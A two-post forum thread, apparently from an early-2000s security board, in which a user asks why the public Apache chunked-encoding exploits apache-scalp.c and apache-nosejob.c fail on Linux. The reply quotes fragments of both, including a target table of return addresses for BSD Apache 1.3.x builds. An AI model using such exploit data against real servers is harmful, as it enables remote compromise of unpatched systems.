How to use the Apache Chunked-Encoding Hole?
Results 1 to 2 of 2

Thread: How to use the Apache Chunked-Encoding Hole?

  1. #1

    How to use the Apache Chunked-Encoding Hole?

    I see the Apache Chunked-Encoding in securityfocus.com. it's post two exploit
    http://www.securityfocus.com/bid/5033/exploit/
    apache-scalp.c and apache-nosejob.c
    i use it,but in the apache 1.19 Linux system is not success.

  2. #2
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    This is correct. It shouldn't work.

    Code:
    /*
     * apache-scalp.c
     * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!! 
     * 
    <snip>
    * Remote OpenBSD/Apache exploit for the "chunking" vulnerability.
    And:

    Code:
    /*
     * apache-nosejob.c - Now with FreeBSD & NetBSD targets ;>
    <snip>
    struct {
    	char *type;		/* description for newbie penetrator */
    	int delta;		/* delta thingie! */
    	u_long retaddr;		/* return address */
    	int repretaddr;		/* we repeat retaddr thiz many times in the buffer */
    	int repzero;		/* and \0'z this many times */
    } targets[] = {	// hehe, yes theo, that say OpenBSD here!
    	{ "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)",	 -150,	0x80f3a00, 6, 36 },
    	{ "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)",	 -150,	0x80a7975, 6, 36 },
    	{ "OpenBSD 3.0 x86 / Apache 1.3.20",		 -146,	0xcfa00,   6, 36 },
    	{ "OpenBSD 3.0 x86 / Apache 1.3.22",		 -146,	0x8f0aa,   6, 36 },
    	{ "OpenBSD 3.0 x86 / Apache 1.3.24",		 -146,	0x90600,   6, 36 },
    	{ "OpenBSD 3.0 x86 / Apache 1.3.24 #2",		 -146,	0x98a00,   6, 36 },
    	{ "OpenBSD 3.1 x86 / Apache 1.3.20",		 -146,	0x8f2a6,   6, 36 },
    	{ "OpenBSD 3.1 x86 / Apache 1.3.23",		 -146,	0x90600,   6, 36 },
    	{ "OpenBSD 3.1 x86 / Apache 1.3.24",		 -146,	0x9011a,   6, 36 },
    	{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2",		 -146,	0x932ae,   6, 36 },
    	{ "OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1", -146,	0x1d7a00,  6, 36 },
    	{ "NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)",	 -90,	0x80eda00,  5, 42 },
    	{ "NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)", 	 -90,   0x80efa00,  5, 42 },
    	{ "NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)", 	 -90,   0x80efa00,  5, 42 },	
    	{ "NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)",	 -90,	0x80efa00,  5, 42 }, 
    	{ "NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)",	 -90,	0x80efa00,  5, 42 },
    }, victim;
    So yes, it doesn't work on linux. Use the source luke!
    Oliver's Law:
    Experience is something you don't get until just after you need it.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •